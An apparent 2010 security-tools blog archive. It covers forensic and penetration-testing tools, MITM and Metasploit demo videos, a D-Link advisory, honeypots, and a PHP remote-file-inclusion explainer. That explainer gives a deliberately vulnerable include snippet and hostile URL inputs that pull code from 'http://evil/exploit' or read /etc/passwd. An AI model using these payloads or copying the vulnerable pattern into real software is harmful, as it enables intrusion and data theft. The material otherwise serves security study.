Monday, August 23, 2010

Forensic Toolkit (FTK) Version 3


Forensic Toolkit® (FTK®) is recognized around the world as the standard in computer forensics software. This court-validated digital investigations platform delivers cutting-edge computer forensic analysis, decryption and password cracking all within an intuitive and customizable interface. FTK 3 is built for speed, analytics and enterprise-class scalability. Known for its intuitive interface, email analysis, customizable data views and stability, FTK lays the framework for seamless expansion, so your computer forensics solution can grow with your organization’s needs. Forensic Toolkit 3 is now the most advanced computer forensics software available, providing functionality that normally only organizations with tens of thousands of dollars could afford.


See also Review: Access Data Forensic Toolkit (FTK) Version 3 — Part 1

Sunday, August 8, 2010

BackTrack 4 Release 1

The BackTrack Team is proud to announce the public release of BackTrack 4 R1.At the risk of sounding like a broken record,we believe this version is by far the best version released to date.With a shiny new 2.6.34 kernel,there are many significant improvements,such as expanded hardware support,and improved desktop responsiveness

Tools have been updated systemwide, and a full Fluxbox desktop environment has been added.A walk-around for the rt28xx driver has been implemented (for all you AWUS050NH owners).
The VMWare version has complete integration with VMWare Tools,which provides a seamless interaction with BackTrack in a virtual environment.

More info and download:

Monday, August 2, 2010

OWASP O2 Platform v1.1 Beta

The OWASP O2 Platform is an OWASP Project which is a collection of Open Source modules that help Web Application Security Professionals to maximize their efforts and quickly obtain high visibility into an application's security profile.The objective is to 'Automate Application Security Knowledge and Workflows"

Download: Here


Thursday, July 29, 2010

XSSer v0.6 - "XSSer Storm"

SSer is an open source penetration testing tool that automates the process of detecting and exploiting XSS injections against different applications.
It contains several options to try to bypass certain filters, and various special techniques of code injection.

XSSer v0.6a aka "XSSer Storm!" supports this new features:
-g DORK Process search engine dork results as target urls
--Ge=DORK_ENGINE Search engine to use for dorking (scroogle,
duck, altavista, bing)
-c CRAWLING Crawl target hierarchy parameters (can be slow!)
--Cw=CRAWLING_WIDTH Number of urls to visit when crawling
--Dfo Encodes fuzzing IP addresses in DWORD format


Thursday, July 22, 2010

"Backup" Tools For Mysql Administration


MySQLDumper is a script for backing up MySQL databases written in PHP and Perl. It uses a proprietary technique to avoid execution interruption by reading and saving a certain amount of commands, then calling itself via JavaScript to memorize how far in the process it was. Finally, the script resumes its action from last standby.



phpMyBackup Pro is a very easy to use, free, web-based MySQL backup script, licensed under the GNU GPL. Script allows a lot of operations such: backup of one or several databases with or without data, table structure; backup directly onto FTP server and sending of backups by email; manage, restore and schedule backups and others. phpMyBackup Pro is platform independent: it requires only a web-server and PHP.


A shell script to take daily, weekly and monthly backups of MySQL databases using mysqldump. It's features includes: backing up mutiple databases, create a backup into a single backup file or to a separate file for each DB, backup files compression, backup to remote server, e-mail user when backup is completed and others.



Backup2Mail is a PHP script that creates regular backups of MySQL databases and sends them to configurable e-mail address. The whole process can be scheduled with a help of Cron (for Unix/Linux) or with Task Scheduler (for Windows).



mylvmbackup is utility for creating MySQL backups via LVM snapshots. To perform this, mylvmbackup obtains a read lock on all tables, flushes all server caches to disk, creates a snapshot of the volume containing the MySQL data directory and unlocks the tables again. The LVM snapshot is mounted to a temporary directory and all data is backed up using the tar or rsync program. Script requires Perl5 and LVM utilities.


MyPHPdumpTool (mpdt)

MyPHPdumpTool is a PHP (CLI) based MySQL backup tool that can be configured to automatically archive and upload any database-dump file to any FTP server. The backup process can be scheduled with a help of Cron (for Unix/Linux) or with Task Scheduler (for Windows).


mysqlblasy (MySQL backup for lazy sysadmins)

mysqlblasy is a Perl script for automating MySQL database backups. The main feature of this script is automatic backups rotation to avoid that the backup disk gets full when the administrator is on vacation (or is lazy). Each database gets dumped into a separate file, after which all the dumps get tarred/compressed and placed into the specified backup directory. Old files in the backup directory get deleted, and the number of newest files that is specified in configuration file is kept.

Code: Dumper Lite

Sypex Dumper Lite is developed by specialists of Ukrainian company and it is a PHP script for quick and easy MySQL database backup. The script is very fast with all types of databases (small or large), because it uses special technique for dumping: the backup file is not stored entirely in memory.


Monday, July 12, 2010

Safe3 SQL Injector

Safe3 SQL Injector is one of the most powerful penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of back-end database servers.

Full support for GET/Post/Cookie Injection;
Full support for HTTP Basic, Digest, NTLM and Certificate authentications
Full support for MySQL, Oracle, PostgreSQL,MSSQL,ACESS,DB2,Sybase,Sqlite
Full support for Error/Union/Blind/Force SQL injection
Support for file acess,command execute,ip domain reverse,web path guess,md5 crack,etc.
Super bypass WAF


Thursday, July 8, 2010


A very fast network logon cracker which support many different services
Currently this tool supports:


Changelog for 5.7:

* Added ncp support plus minor fixes (by David Maciejak @ GMAIL dot com)
* Added an old patch to fix a memory from SSL and speed it up too from kan(at)
* Removed unnecessary compiler warnings
* Enhanced the SSH2 module based on an old patch from aris(at)
* Fixed small local defined overflow in the teamspeak module. Does it still work anyway??


Wednesday, July 7, 2010

Maltego version 3

Maltego is an open source intelligence and forensics application. It will offer you timous mining and gathering of information as well as the representation of this information in a easy to understand format.

Maltego can be used for the information gathering phase of all security related work. It will save you time and will allow you to work more accurately and smarter.
Maltego aids you in your thinking process by visually demonstrating interconnected links between searched items.
Maltego provide you with a much more powerful search, giving you smarter results.
If access to "hidden" information determines your success, Maltego can help you discover it.

Download and more info:

Monday, July 5, 2010


NetworkMiner is a Network Forensic Analysis Tool (NFAT) for Windows that can detect the OS, hostname and open ports of network hosts through packet sniffing or by parsing a PCAP file. NetworkMiner can also extract transmitted files from network traffic including common image file formats = fun !


Thursday, July 1, 2010

SSLCertScanner : New Tool to Scan for SSL Certificates on Network

SSLCertScanner is the FREE network based SSL certificate scanner software. It can remotely scan SSL certificate on any host which may present on the intranet or internet. It can also scan single host or multiple hosts at a time. Once the SSL certificate is discovered, SSLCertScanner automatically validates it by checking for expiry date.
SSLCertScanner supports HTTPS as well as LDAPS based SSL services for certificate scanning. During the scanning it displays detailed status message of current operation for each host.


Monday, June 28, 2010

Xplico 0.5.7 - VoIP "Wire" Tapping

Xplico is an open source Network Forensic Analysis Tool. Its goal is to extract from an Internet traffic capture the applications data contained. From a pcap file Xplico extracts each email (POP, IMAP, and SMTP protocols), all HTTP contents, each VoIP call (SIP), FTP, TFTP, and so on.

This release introduces improvements in the SIP and RTP dissectors.
In this version was also added the RTCP dissector, with this dissector Xplico is able to obtain the phone numbers of the caller and called party (obviously only if present in the RTCP packets).

DEFT 5.1 Live distribution contains this version.

Download :

Sunday, June 27, 2010

DEFT Linux 5.1 Computer Forensic Live CD

DEFT Linux is a highly specialized Linux distribution aimed at forensic computing. It comes with a number of dedicated tools and is a computer investigator’s best friend. The latest release, DEFT Linux 5.1, is a small maintenance update, which brings some newer packages and fixes a couple of bugs

What’s new?
Update: Sleuthkit 3.1.1 and Autopsy 2.24
Update: Xplico to 0.5.7 (100% support of SIP – RTP codec g711, g729, g722, g723 and g726, SDP and RTCP)
Update: Initrd
Bug fix: Dhash report (reports were not generated)
Bug fix: DEFT Extra bug fix (a few tools did not work if the operator click on their icons, added the dd tool for x64 machines)


Thursday, June 24, 2010

Live Hacking Linux Security Distro Bootable CD

Live Hacking CD is a new Linux distribution packed with tools and utilities for ethical hacking, penetration testing and countermeasure verification. Based on Ubuntu this ‘Live CD” runs directly from the CD and doesn’t require installation on your hard-drive. Once booted you can use the included tools to test, check, ethically hack and perform penetration tests on your own network to make sure that it is secure from outside intruders.

The CD comes in two forms. A full Linux desktop including a graphical user interface (GNOME) and applications like Firefox along with tools and utilities for DNS enumeration, reconnaissance, foot-printing, password cracking and network sniffing. For greater accessibility there is a Live Hacking menu to help you quick find and launch the tools.

The second variation is the Live Hacking Mini CD, which is command line only. However this doesn't detract from the power of the tools and utilities included as most of the penetration testing and ethical hacking tools are command line tools. The included /lh directory has symbolic links to the different tools included.


Tuesday, June 22, 2010

Lens version

Lens ASP.NET Penetration Testing Tool

Lens is an open-source ethical hacking tool specialized to penetration testing of ASP.NET web applications. Lens is written in WPF 4 and its internal modular architecture allows us to easily add new tests to the system.
Base features
Resize-friendly window structure
Window position is preserved across sessions
Built-in zoom
Detailed log window
Links to online information about the attacks and fixes

You can use our Lens tool to test your site against the following attacks
Session state
Session fixation (available in v.
Forms authentication
Eavesdropping (available in v.
Information disclosure (available in v.
Event handler bypass
Event handling
Postback to disabled controls
Postback to invisible controls
One-click attack


Sunday, June 20, 2010

Bruter 1.0

Bruter is a parallel network login brute forcer on Win32 platform only. It currently supports following services: FTP, HTTP (Basic), HTTP (Form), IMAP, MSSQL, MySQL, POP3,SMB-NT, SMTP, SNMP, SSH2, Telnet, VNC.

To see full changelog since alpha version check:


Wednesday, June 16, 2010

Social-Engineering Toolkit


The Social-Engineering Toolkit (SET) is a python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing. It's main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed. Currently SET has two main methods of attack, one is utilizing.Metasploit payloads and Java-based attacks by setting up a malicious website that ultimately delivers your payload. The second method is through file-format bugs and e-mail phishing. The second method supports your own open-mail relay, a customized sendmail open-relay, or Gmail integration to deliver your payloads through e-mail. The goal of SET is to bring awareness to the often forgotten attack vector of social-engineering.


For more info and video demo check: David Kennedy (ReL1K) website

Monday, June 14, 2010

x5s - Automated Cross-Site Scripting

x5s is a Fiddler addon which aims to assist penetration testers in finding cross-site scripting vulnerabilities. It's main goal is to help you identify the hotspots where XSS might occur by:

  • Detecting where safe encodings were not applied to emitted user-inputs
  • Detecting where Unicode character transformations might bypass security filters
  • Detecting where non-shortest UTF-8 encodings might bypass security filters
It injects ASCII to find traditional encoding issues, and it injects special Unicode characters and encodings to help an analyst identify where XSS filters might be bypassed. The approach to finding these hotspots involves injecting single-character probes separately into each input field of each request, and detecting how they were later emitted. The focus is on reflected XSS issues however persisted issues can also be detected. The idea of injecting special Unicode characters and non-shortest form encodings was to identify where transformations occur which could be used to bypass security filters. This also has the interesting side effect of illuminating how all of the fields in a Web-app handle Unicode. For example, in a single page with many inputs, you may end up seeing the same test case get returned in a variety of ways – URL encoded, NCR encoded, ill-encoded, raw, replaced, dropped, etc. In some cases where we’ve had Watcher running in conjunction, we’ve been able to detect ill-formed UTF-8 byte sequences which is indicative of ‘other’ problems.

x5s acts as an assistant to the security tester by speeding up the process of parameter manipulation and aggregating the results for quick viewing. It automates some of the preliminary XSS testing work by enumerating and injecting canaries into all input fields/parameters sent to an application and analyzing how those canaries were later emitted. E.g. Was the emitted output encoded safely or not? Did an injected character transform to something else?

x5s does not inject XSS payloads - it does not attempt to exploit or confirm an XSS vulnerability. It's designed to draw your attention to the fields and parameters which seem likely candidates for vulnerability. A security-tester would review the results to find issues where special characters were dangerously transformed or emitted without a safe encoding. This can be done by quickly scanning the results, which have been designed with the intention of providing quick visual inspection. Results filters are also included so the tester could simply click show hotspots to see only the potential problem areas. After identifying a hotspot it's the tester's job to perform further validation and XSS testing.

The types of test cases that x5s includes:
  1. Traditional test cases - characters typically used to test for XSS injection such as <, >, ",and ' which are used to control HTML, CSS, or javascript;
  2. Transformable test cases - characters that might uppercase, lowercase, Normalize, best-fit map, or other wise transform to completely different characters, E.g. the Turkish 'İ' which will lower-case to 'i' in culture-aware software.
  3. Overlong UTF-8 test cases - non-shortest UTF-8 encodings of the 'traditional' test cases noted above. E.g. the ASCII < is 0x3C normally and 0xC0 0xBC in non-shortest form UTF-8.

Friday, June 11, 2010

W3af v1.0-rc3

W3af, is a Web Application Attack and Audit Framework. The w3af core and it’s plugins are fully written in python. The project has more than 130 plugins, which check for SQL injection, cross site scripting (xss), local and remote file inclusion and much

The development team is proud to announce a new w3af release! Some of the features of the 1.0-rc3 version are:

* Enhanced GUI, including huge changes in the MITM proxy and the Fuzzy Request Editor
* Increased speed by rewriting parts of the thread management code
* Fixed tons of bugs
* Reduced memory usage
* Many plugins were rewritten using different techniques that use less HTTP requests to identify the same vulnerabilities
* Reduced false positives

You can download the latest versions from the official w3af website:

Thursday, June 10, 2010


Jacknsee is an educational network security tool. Its purpose is to teach students in computer science how basic hijacking techniques are used to corrupt a network. A few examples are given: man in the middle, DoS, stack buffer overflow attack

Video demo:

Download and more info:

Tuesday, June 8, 2010

SamuraiWTF 0.8

Web penetration testing live CD built on open source software

The Samurai Web Testing Framework is a live linux environment that has been pre-configured to function as a web pen-testing environment. The CD contains the best of the open source and free tools that focus on testing and attacking websites. In developing this environment, we have based our tool selection on the tools we use in our security practice. We have included the tools used in all four steps of a web pen-test.

This version includes metasploit, target applications and tons of tool updates. It is now DVD sized as it has out grown the CD release

More info and Download:

Monday, June 7, 2010

SpiderLabs Defacetool

DefaceTool is an open-source Java Server Faces(JSF)testing tool for decoding view state and creating view state attack vectors. The tool can be used to create XSS attacks and session and application scope attacks against Apache MyFaces 1.2.8 applications. The tool has been architected to be extensible and can be modified to support other versions of Apache MyFaces and Sun Mojarra.


Friday, June 4, 2010

D-Link Routers: One Hack to Own Them All

Multiple D-Link Routers Vulnerable to Authentication Bypass

Multiple D-Link routers suffer from insecure implementations of the Home
Network Administration Protocol which allow unauthenticated and/or
unprivileged users to view and configure administrative settings on the

Further, the mere existence of HNAP allows attackers to completely bypass
the CAPTCHA login features that D-Link has made available in recent
firmware releases.

These vulnerabilities can be exploited by an individual inside the local
network, as well as an external attacker.

It is suspected that most, if not all, D-Link routers manufactured since
2006 have HNAP support and are vulnerable. However, only the following
routers and firmware versions have been confirmed to date:

1) DI-524 hardware version C1, firmware version 3.23
2) DIR-628 hardware version B2, firmware versions 1.20NA and
3) DIR-655 hardware version A1, firmware version 1.30EA

You can read full write-up here, and download POC tool, HNAP0wn, here.

Wednesday, June 2, 2010


WebRaider is a plugin based automated web application exploitation tool which focuses to get a shell from multiple targets or injection point

Internally WebRaider uses Metasploit. We use a specific version of Metasploit. We trim the fat from Metasploit to launch it faster and make it smaller. You can change the paths and make it work with the latest Metasploit of your own setup.

Note: Your antivirus won't like the WebRaider download package as it includes reverse shell executables and other metasploit files.

WebRaider Presentation and White Paper and Download

Monday, May 31, 2010

Plecost: Wordpress Finger Printer

Wordpress finger printer tool, plecost search and retrieve information about the plugins versions installed in Wordpress systems. It can analyze a single URL or perform an analysis based on the results indexed by Google. Additionally displays CVE code associated with each plugin, if there.

Plecost retrieves the information contained on Web sites supported by Wordpress, and also allows a search on the results indexed by Google.


Thursday, May 27, 2010


Clickjacking is a term first introduced by Jeremiah Grossman and Robert Hansen in 2008 to describe a technique whereby an attacker tricks a user into performing certain actions on a website by hiding clickable elements inside an invisible iframe.

Although it has been two years since the concept was first introduced, most websites still have not implemented effective protection against clickjacking. In part, this may be because of the difficulty of visualising how the technique works in practice.

This new browser-based tool allows a user to experiment with clickjacking techniques by using point-and-click to visually select different elements within a webpage to be targeted. The tool also allows several 'next-generation' clickjacking techniques to be used, as introduced in Paul Stone's Blackhat Europe 2010 talk.

Among the features of the new tool are:
Use point-and-click to select the areas of a page to be targeted
Supports the new 'text-field injection' technique
Supports the new 'content extraction' technique
'Visible mode' replay allowing a user to see how the technique works behind the science
'Hidden mode' replay allows the same steps to be replayed in a hidden manner, simulating a real clickjacking attack.
The tool is currently in an early beta stage, and works best in Firefox 3.6. Full support for other browsers will follow shortly. For further information, please see the Readme.txt file in the downloadable tool.

Monday, May 24, 2010

Cracking WPA2 Password Using Pyrit (GPU Cracking)

In this video its shown how to attack Wireless Networks using Pyrit tool. Pyrit is a GPU cracker for attacking WPA/WPA2 PSK protocols. It allows to create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time-tradeoff. Pyrit takes a step ahead in attacking WPA-PSK and WPA2-PSK. Download and other details can be found here.

Thursday, May 20, 2010

Nmap Using TOR Networks


A good video showing how to scan networks with Nmap using Tor network to stay anonymous.
An Attacker downloads and configure TorTunnel,TOR bundle and proxychains. After setting up everything, an attacker uses nmap to find out the services running on different IP addresses. The main purpose of this video to stay anonymous while scanning different networks.

Monday, May 17, 2010

Milw0rm Exploits Archive

A live demo on how to use the latest exploits from on backtrack live distro in detail. In this video, the attacker launches an attack against a Dream FTP Server to crack the administrator 's password running on a windows box.

Thursday, May 13, 2010

Karmetasploit on Backtrack4

This video is about using karma exploit from Metasploit on Backtrack 4. An Attacker will setup his own fake Access Point in monitor mode, DHCP daemon and a web server daemon. Attacker runs Metasploit's karma exploit. The moment an IP address is assigned to the victim's PC, all the activity is logged at the attacker's machine including the URL visited and credentials used for mail and web access.

Monday, May 10, 2010

Sniffing And HTML Injection

This video explains various examples of network sniffing and HTML injection with Ettercap-NG tool on BackTrack-4 on a Local Area Network. It shows how an attacker can change text of chat messages within LiveMessanger using ettercap filters and also using Ettercap plugin, Filters, filterf_modify, file-inject. An Attacker can even find who else is ARP poisoning on LAN using search_poisoning ettercap plugin.

Wednesday, May 5, 2010

Wireless Key Grabber

This video shows how to use Wireless Key Grabber. It requires lighttpd and it runs a fake wireless access point to grab wireless keys. Whenever a user tries to connect to any website after connecting to this fake access point, his browser is forwarded to a customized URL. Metasploit DLL injection is used to grab wireless key.

Download link is here :
Script information is here :

Monday, May 3, 2010

DNS Spoofing And Browser Spying Part 2

In this video an attacker sniffs network traffic from a remote machine using ARP and DNS Spoofing with Ettercap.Uses Driftnet program to listens to network traffic and sniff out images from TCP streams on the network.And finally uses remote_browser plugin of ettercap which sends visited URLs of the victim to attackers browser.Like this an attacker's browser follows what ever the victim is browsing.

Friday, April 30, 2010

DNS Spoofing And Browser Spying Part 1

This is the first video of three parts that explains various examples of sniffing using the Ettercap-NG tool, on BackTrack-4, in a Local Area Network scenario. This part explains OS Fingerprinting - Arp Poisoning and one example using Etterfilter.

Wednesday, April 28, 2010

HTML Injection in NASA Website

Last February 25, 2010 I made a full disclosure type of post here regarding multiple server "0-day" vulnerabilities. I believe most (if not all) of these live vulnerabilities have already been fixed thanks to the media like CBS News who broke it (together with the NSA defacement) to public in one of their "cyber war" reports involving the China Google hacking incident if my memory serves me right. Anyway, here is the last exploit which is a good example of html injection for those who are interested in studying it further.

Monday, April 26, 2010

Sniffing SSL Secured Logins with Ettercap

A Small video showing how easy it is to intercept HTTPS traffic from switched local network by spoofing the SSL certificate using man in the middle attack with Ettercap. The attacker uses one way ARP poisoning on victim and issues a fake spoofed SSL certificates on a switched Ethernet network.

Friday, April 23, 2010

DHCP Spoofing MITM Attack Using Ettercap

This video is showing how to spoof DHCP IP assignment using Ettercap. When a new PC is added on the network which is configured to have IP address dynamically from a DHCP address. An attcker can spoof this IP assignment process and provide his own IPs, like a gateway which has been configured to sniff their usernames and passwords.

Thursday, April 22, 2010

Bluetooth sniffing in Linux

A very good video showing how to sniff BlueTooth Pin while pairing two BlueTooth devices and then crack it. 

Tuesday, April 20, 2010

Securing Web Applications

Securing Web Services - Presentation Transcript
  1. Securing Web Applications Tara Kissoon, CISA, CISSP Visa Inc.
  2. Objectives The participant will learn more about: How to integrate OWASP Top 10 to mitigate Web application security vulnerabilities.
  3. What is an application? An application: – Defined as user software – Is made up of a number of files, including configuration files, executable programs and data files. – Is layered above an operating system and uses the functionality of the operating system to deliver its service. – The operating system provides a number of mechanisms used for securing the application. – Contains security functionality that uses mechanisms not residing within the operating system.  
  4. This presentation is on Web Services Security , pointing at almost all of the fields requires attention for web application security.Shows how to effectively manage application development lifecycle and how to integrate Top 10 OWASP projects to develop any application keeping security in mind.

    A1 - Cross Site Scripting (XSS)

    A2 - Injection Flaws

    A3 - Malicious File Execution

    A4 - Insecure Direct Object Reference

    A5 - Cross Site Request Forgery (CSRF)

    A6 - Information Leakage and Improper Error Handling

    A7 - Broken Authentication and Session Management

    A8 - Insecure Cryptographic Storage

    A9 - Insecure Communications

    A10 - Failure to Restrict URL Access

Monday, April 19, 2010

Windows SMB Relay Exploit

In this Underground video, Overide demonstrates how to obtain root access on a fully patched Windows XP SP3 Machine. He exploits a flaw in Windows Server Message Block (SMB) which is used to provide shared access to files between hosts on a network. Overide utilizes the Metasploits Framework to run the exploit. It works by relaying a SMB authentication request to another host which provides Metasploit with a authenticated SMB session, and if the user is an administrator, Metasploits will be able to execute code on the target computer such as a reverse shell. For this exploit to run, the target computer must try to authenticate to Metasploit. Overide forces the target computer to perform a SMB authentication attempt by using a Ettercap Filter.

A live demonstration of obtaining admin access on a Windows XP SP3 Machine. Exploits a flaw in Windows Server Message Block (SMB) which provides shared access to files and folders on network. Hacker utilizes Metasploits Framework to run the exploit.It works by relaying a SMB authentication request to another host which provides Metasploit with a authenticated SMB session, and if the user is an administrator, Metasploits will be able to execute code on the target computer and can even get a reverse shell.Hacker forces the target computer to perform a SMB authentication attempt by using a Ettercap Filter.For authentication target computer is forwarded to Metasploit.

Sunday, April 18, 2010

Remote Shell with a Word document

Using a Metasploit payload on Backtrack 4 to create a macro enabled Microsoft Word document which upon execution opens up a remote shell.

Friday, April 16, 2010


Honey Pot Systems are decoy servers or systems setup to gather information regarding an attacker or intruder into your system. It is important to remember that Honey Pots do not replace other traditional Internet security systems; they are an additional level or system.

Honey Pots can be setup inside, outside or in the DMZ of a firewall design or even in all of the locations although they are most often deployed inside of a firewall for control purposes. In a sense, they are variants of standard Intruder Detection Systems (IDS) but with more of a focus on information gathering and deception.

An example of a Honey Pot systems installed in a traditional Internet security design:
figure 1
A Honey Pot system is setup to be easier prey for intruders than true production systems but with minor system modifications so that their activity can be logged of traced. The general thought is that once an intruder breaks into a system, they will come back for subsequent visits. During these subsequent visits, additional information can be gathered and additional attempts at file, security and system access on the Honey can be monitored and saved.

Generally, there are two popular reasons or goals behind setting up a Honey Pot:
  1. Learn how intruders probe and attempt to gain access to your systems. The general idea is that since a record of the intruder’s activities is kept, you can gain insight into attack methodologies to better protect your real production systems.
  2. Gather forensic information required to aid in the apprehension or prosecution of intruders. This is the sort of information often needed to provide law enforcement officials with the details needed to prosecute.
The common line of thought in setting up Honey Pot systems is that it is acceptable to use lies or deception when dealing with intruders. What this means to you when setting up a Honey Pot is that certain goals have to be considered.

Those goals are:
  1. The Honey Pot system should appear as generic as possible. If you are deploying a Microsoft NT based system, it should appear to the potential intruder that the system has not been modified or they may disconnect before much information is collected.
  2. You need to be careful in what traffic you allow the intruder to send back out to the Internet for you don’t want to become a launch point for attacks against other entities on the Internet. (One of the reasons for installing a Honey Pot inside of the firewall!)
  3. You will want to make your Honey Pot an interesting site by placing "Dummy" information or make it appear as though the intruder has found an "Intranet" server, etc. Expect to spend some time making your Honey Pot appear legitimate so that intruders will spend enough time investigating and perusing the system so that you are able to gather as much forensic information as possible.
Some caveats exist that should be considered when implementing a Honey pot system. Some of the more important are:

The first caveat is the consideration that if the information gathered from a Honey Pot system is used for prosecution purposes, it may or may not be deemed admissible in court. While information regarding this issue is difficult to come by, having been hired as an expert witness for forensic data recovery purposes, I have serious reservations regarding whether or not all courts will accept this as evidence or if non-technical juries are able to understand the legitimacy of it as evidence.

The second main caveat for consideration is whether hacking organizations will rally against an organization that has set "traps" and make them a public target for other hackers. Examples of this sort of activity can be found easily on any of the popular hacker’s sites or their publications.

Thursday, April 15, 2010

PHP Remote File Inclusion

Remote File Inclusion is a technique used to attack websites from a remote computer.RFI allow malicious users to run their own PHP code on a vulnerable website.This allows the attacker to use and run any remote file just by editing the URL. Like a webshell can display the files and folders on the server and can add,edit or delete files and folders,send spams and even get hold of root.

Remote File Inclusion (RFI) is a type of vulnerability most often found on websites, it allows an attacker to include a remote file usually through a script on the web server. The vulnerability occurs due to the use of user supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file, but depending on the severity, to list a few it can lead to:
  • Code execution on the web server
  • Code execution on the client-side such as Javascript which can lead to other attacks such as cross site scripting (XSS).
  • Denial of Service (DoS)
  • Data Theft/Manipulation

In PHP the main cause is due to the use of unvalidated external variables such as $_GET, $_POST, $_COOKIE with a filesystem function, most notable are the include and require statements. Most of the vulnerabilities can be attributed to novice programmers not being familiar with all of the capabilities of the PHP programming language. The PHP language has an allow_url_fopen directive and if enabled it allows filesystem functions to use a URL which allow them to retrieve data from remote locations. An attacker will alter a variable that is passed to one of these functions to cause it to include malicious code from a remote resource. To mitigate this, all user input needs to be validated before being used.


Consider this PHP script (which includes a file specified by request):

   $color = 'blue';
   if (isset( $_GET['COLOR'] ) )
      $color = $_GET['COLOR'];
   require( $color . '.php' );
> type="submit"> >
The developer intended only blue.php and red.php to be used as options. But as anyone can easily insert arbitrary values in COLOR, it is possible to inject code from files:
  • /vulnerable.php?COLOR=http://evil/exploit? - injects a remotely hosted file containing an exploit.
  • /vulnerable.php?COLOR=C:\\ftp\\upload\\exploit - Executes code from an already uploaded file called exploit.php
  • /vulnerable.php?COLOR=../../../../../../../../etc/passwd - allows an attacker to read the contents of the passwd file on a UNIX system directory traversal.
  • /vulnerable.php?COLOR=C:\\notes.txt - example using NULL meta character to remove the .php suffix, allowing access to files other than .php. (With magic_quotes_gpc enabled this limits the attack by escaping special characters, this disables the use of the Null character)

Wednesday, April 14, 2010

SSH Hacking

In this video, a shell script does the work on Linux to hack into a ssh account.  Then a dictionary attack is launched against SSH using the shell script to crack the password.

Tuesday, April 13, 2010

Using NetCat as a Backdoor

In this video a windows RPC exploit is used with the help of Metasploit on Backtrack.After exploiting the RPC vulnerability in windows,hacker uploads Netcat tool to regain access when ever he wants.

Monday, April 12, 2010

Metasploit Autopwn Tool


This Video shows MetaSploit Autopwn tool in action.After identifying a victim's machine using port scanning techniques. Just run the Metasploit framework and connect to sqlite database. Then run a port scan on victim's machine so that the result is saved in the database. After that, run the Autopwn tool against the port scan result, Autopwn will automatically run all the exploits against the open port.When the attack completes successfully, we get open sessions. This can also be achived by running Autopwn exploits against the result saved by Nessus in NBE format.

Sunday, April 11, 2010

Dump Cleartext Passwords From Windows Memory

MDD is a physical memory acquisition tool for imaging Windows based computers created by the innovative minds at ManTech International Corporation. MDD is capable of acquiring memory images from Win2000, XP, Vista and Windows Server.

Friday, April 9, 2010

DNS Spoof Virtual Hosts

DNS Spoofing is a type of MITM attack in which victim's computer is sent a fake DNS reply for a particular website,forcing his machine to visit a different site.But when this Spoofed IP is hosting multiple virtual sites with multiple Host Headers and attacker wants to use this IP as a fake DNS reply for DNS Spoofing then the server will not be able to determine the proper destination as Host Header will be missing in the request.Hence DNS Spoofing attack will not success.

In this video , Ettercap is combined with a C program to change the host header on the fly and submits a new get request to the web server, which allows an attacker to successfully launch DNS Spoofing attack with a IP hosting multiple virtual web sites.

Thursday, April 8, 2010

Attacking Oracle with the Metasploit Framework

The Oracle Database (commonly referred to as Oracle RDBMS or simply as Oracle) is a relational database management system (RDBMS) produced and marketed by Oracle Corporation. As of 2009, Oracle remains a major presence in database computing.
Larry Ellison and his friends and former co-workers Bob Miner and Ed Oates started the consultancy Software Development Laboratories (SDL) in 1977. SDL developed the original version of the Oracle software. The name Oracle comes from the code-name of a CIA-funded project Ellison had worked on while previously employed by Ampex.

Wednesday, April 7, 2010

Auditing Anti-Virus Configuration and Installation with Nessus 3

Nessus is a proprietary comprehensive vulnerability scanning program. It is free of charge for personal use in a non-enterprise environment. Its goal is to detect potential vulnerabilities on the tested systems. For example:
  • Vulnerabilities that allow a remote cracker to control or access sensitive data on a system.
  • Misconfiguration (e.g. open mail relay, missing patches, etc).
  • Default passwords, a few common passwords, and blank/absent passwords on some system accounts. Nessus can also call Hydra (an external tool) to launch a dictionary attack.
  • Denials of service against the TCP/IP stack by using mangled packets
On UNIX (including Mac OS X), it consists of nessusd, the Nessus daemon, which does the scanning, and nessus, the client, which controls scans and presents the vulnerability results to the user. For Windows, Nessus 3 installs as an executable and has a self-contained scanning, reporting and management system. According to surveys done by, Nessus is the world's most popular vulnerability scanner, taking first place in the 2000, 2003, and 2006 security tools survey. Tenable estimates that it is used by over 75,000 organizations worldwide.

Tuesday, April 6, 2010

Exploiting XP with SAINT

The SAINT vulnerability scanner identifies threats across your network including devices, operating systems, desktop applications, Web applications, databases, and more. The penetration testing component is integrated with the SAINT vulnerability scanner. SAINTexploit automates the penetration testing process, examines vulnerabilities discovered by the scanner, exposes where the attacker could breach the network, and exploits the vulnerability prove its existence without a doubt.

Monday, April 5, 2010

Exploiting Windows Vista with Core Impact 8

CORE IMPACT is a commercial automated penetration testing software solution developed by Core Security Technologies which allows the user to probe for and exploit security vulnerabilities in computer networks, endpoints and web applications.
The product's interface is designed to be usable by individuals both with and without specialized training in penetration testing and vulnerability assessment, and includes functions for generating reports from the gathered information. It is used by over 800 companies and government entities worldwide.
Core Impact is designed to attempt to evaluate the whole of the security in an office ecosystem, checking for known exploits, vulnerability to psychological attack, viability of current software and hardware security, as well checking for compliance with government regulation.

Hacking Guestbook (Redirect)

Sunday, April 4, 2010

Owning with Nessus and Metasploit

Nessus is a proprietary comprehensive vulnerability scanning program. It is free of charge for personal use in a non-enterprise environment. Its goal is to detect potential vulnerabilities on the tested systems. For example:
  • Vulnerabilities that allow a remote cracker to control or access sensitive data on a system.
  • Misconfiguration (e.g. open mail relay, missing patches, etc).
  • Default passwords, a few common passwords, and blank/absent passwords on some system accounts. Nessus can also call Hydra (an external tool) to launch a dictionary attack.
  • Denials of service against the TCP/IP stack by using mangled packets.
On UNIX (including Mac OS X), it consists of nessusd, the Nessus daemon, which does the scanning, and nessus, the client, which controls scans and presents the vulnerability results to the user. For Windows, Nessus 3 installs as an executable and has a self-contained scanning, reporting and management system.
According to surveys done by, Nessus is the world's most popular vulnerability scanner, taking first place in the 2000, 2003, and 2006 security tools survey. Tenable estimates that it is used by over 75,000 organizations worldwide.

Saturday, April 3, 2010

Packing Metasploit's Meterpreter with Calculator using IExpress

This video demonstrates how a built in tool of XP and Vista (IExpress), can be used to pack a malicious payload with a real program to make it less likely for a user to think anything malicious is happening.

Friday, April 2, 2010

Meterpreter as a Backdoor

A backdoor in a computer system (or cryptosystem or algorithm) is a method of bypassing normal authentication, securing remote access to a computer, obtaining access to plaintext, and so on, while attempting to remain undetected. The backdoor may take the form of an installed program (e.g., Back Orifice), or could be a modification to an existing program or hardware device.

